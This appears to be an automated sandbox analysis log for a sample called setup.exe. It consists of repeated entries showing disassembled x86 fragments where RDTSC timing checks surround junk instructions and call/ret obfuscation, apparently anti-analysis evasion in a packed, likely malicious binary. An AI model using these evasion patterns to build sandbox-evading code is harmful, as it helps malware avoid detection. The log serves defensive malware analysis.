                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7C8F5 second address: E7C90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE0B4F44DD0h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7D412 second address: E7D418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7D1D3 second address: E7D1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7EB1F second address: E7EB88 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FE0B4522B18h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FE0B4522B18h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov esi, 5F741A67h 0x00000046 push 00000000h 0x00000048 pushad 0x00000049 sub dx, 3DC2h 0x0000004e or ecx, dword ptr [ebp+1247ABB6h] 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7DE01 second address: E7DE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7E869 second address: E7E86F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7EB88 second address: E7EB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7DE05 second address: E7DE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7F65C second address: E7F660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7F364 second address: E7F368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8469E second address: E846C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FE0B4F44DD8h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E846C1 second address: E846D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4522B21h 0x00000009 pop ecx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E846D7 second address: E846E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E393B9 second address: E393BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E393BF second address: E393E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FE0B4F44DCEh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E86D3B second address: E86D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E86D3F second address: E86D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE0B4F44DC6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8AFA1 second address: E8AFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8AFA7 second address: E8B000 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE0B4F44DD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FE0B4F44DC8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b jbe 00007FE0B4F44DCBh 0x00000031 mov edi, 2B6E0E33h 0x00000036 mov edi, dword ptr [ebp+12487F5Eh] 0x0000003c push eax 0x0000003d push esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8905A second address: E89068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FE0B4522B16h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8A07E second address: E8A082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8B22F second address: E8B234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8F686 second address: E8F6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FE0B4F44DC8h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E90628 second address: E9068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FE0B4522B18h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D2603h], esi 0x0000002a mov bx, dx 0x0000002d push 00000000h 0x0000002f adc edi, 7F828764h 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D28EBh] 0x0000003d xchg eax, esi 0x0000003e jmp 00007FE0B4522B1Bh 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9165A second address: E9165F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9165F second address: E91669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE0B4522B16h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4349A second address: E434B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE0B4F44DC6h 0x0000000a jmp 00007FE0B4F44DD3h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E434B7 second address: E434BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E434BB second address: E434E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007FE0B4F44DE1h 0x00000016 push ecx 0x00000017 push edx 0x00000018 pop edx 0x00000019 jmp 00007FE0B4F44DCFh 0x0000001e pop ecx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E94A14 second address: E94A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4522B27h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E94A30 second address: E94A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E94A3D second address: E94A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E917DC second address: E917E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E917E1 second address: E91804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4522B28h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E91804 second address: E91808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E971EE second address: E971F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E91808 second address: E9189B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FE0B4F44DCCh 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov ebx, dword ptr [ebp+122D38AEh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov ebx, dword ptr [ebp+122D3992h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FE0B4F44DC8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D1195h] 0x00000049 je 00007FE0B4F44DCCh 0x0000004f mov edi, dword ptr [ebp+122D3ADEh] 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007FE0B4F44DC8h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 jmp 00007FE0B4F44DCCh 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9189B second address: E918A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE0B4522B16h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9086C second address: E90873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E90873 second address: E90878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9911F second address: E99148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FE0B4F44DCCh 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E99148 second address: E991A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE0B4522B1Eh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, 10AE5533h 0x00000011 mov bx, B0ECh 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D1E39h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FE0B4522B18h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push ecx 0x0000003c pushad 0x0000003d popad 0x0000003e pop ecx 0x0000003f jmp 00007FE0B4522B21h 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E991A9 second address: E991C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FE0B4F44DCFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9730C second address: E97310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E97310 second address: E97314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E97314 second address: E9731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9731A second address: E973BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE0B4F44DC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FE0B4F44DC8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e cld 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FE0B4F44DC8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov ebx, esi 0x00000052 mov ebx, 7AC4747Dh 0x00000057 mov eax, dword ptr [ebp+122D1759h] 0x0000005d cmc 0x0000005e push FFFFFFFFh 0x00000060 jmp 00007FE0B4F44DCFh 0x00000065 nop 0x00000066 pushad 0x00000067 jnp 00007FE0B4F44DCCh 0x0000006d je 00007FE0B4F44DCCh 0x00000073 je 00007FE0B4F44DC6h 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jc 00007FE0B4F44DC8h 0x00000083 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E973BE second address: E973D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4522B21h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E973D3 second address: E973D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9E40E second address: E9E42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4522B28h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9E42C second address: E9E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE0B4F44DCEh 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3E469 second address: E3E470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3E470 second address: E3E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3E47B second address: E3E47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA21BD second address: EA21C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA68FF second address: EA6909 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE0B4522B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA9009 second address: EA9044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE0B4F44DD6h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FE0B4F44DD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA9044 second address: EA9049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E32AD2 second address: E32AE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAD183 second address: EAD193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007FE0B4522B16h 0x0000000f pop eax 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAD8AC second address: EAD8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAD8B0 second address: EAD8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAD8B4 second address: EAD8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE0B4F44DCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAD8CA second address: EAD8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAD8D0 second address: EAD8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAD8D4 second address: EAD8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAD8D8 second address: EAD8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAD8E6 second address: EAD8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3C9D4 second address: E3C9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE0B4F44DD9h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E813FE second address: E814C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov ecx, edi 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FE0B4522B18h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b sub di, DF1Bh 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 jmp 00007FE0B4522B26h 0x0000003c mov dword ptr [ebp+1249606Ch], esp 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007FE0B4522B18h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c or edx, dword ptr [ebp+122D3966h] 0x00000062 cmp dword ptr [ebp+122D3A7Ah], 00000000h 0x00000069 jne 00007FE0B4522C0Ch 0x0000006f mov byte ptr [ebp+122D1CCBh], 00000047h 0x00000076 jc 00007FE0B4522B1Bh 0x0000007c mov edi, 0105AA21h 0x00000081 mov eax, D49AA7D2h 0x00000086 call 00007FE0B4522B1Fh 0x0000008b mov dword ptr [ebp+122D1C3Ch], ecx 0x00000091 pop edx 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 jne 00007FE0B4522B18h 0x0000009b pushad 0x0000009c popad 0x0000009d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E81BF9 second address: E81BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E81BFF second address: E81C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E820A1 second address: E820C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FE0B4F44DD1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007FE0B4F44DC6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E820C7 second address: E820D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4522B1Bh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E820D6 second address: E820DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E82520 second address: E82524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E82524 second address: E8252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8252A second address: E82534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FE0B4522B16h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E825BD second address: E825C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E825C1 second address: E8268A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FE0B4522B2Fh 0x0000000c jmp 00007FE0B4522B29h 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FE0B4522B18h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov ecx, dword ptr [ebp+12482FD4h] 0x00000033 lea eax, dword ptr [ebp+12496058h] 0x00000039 jnl 00007FE0B4522B30h 0x0000003f nop 0x00000040 pushad 0x00000041 push eax 0x00000042 jmp 00007FE0B4522B29h 0x00000047 pop eax 0x00000048 jc 00007FE0B4522B18h 0x0000004e push edi 0x0000004f pop edi 0x00000050 popad 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 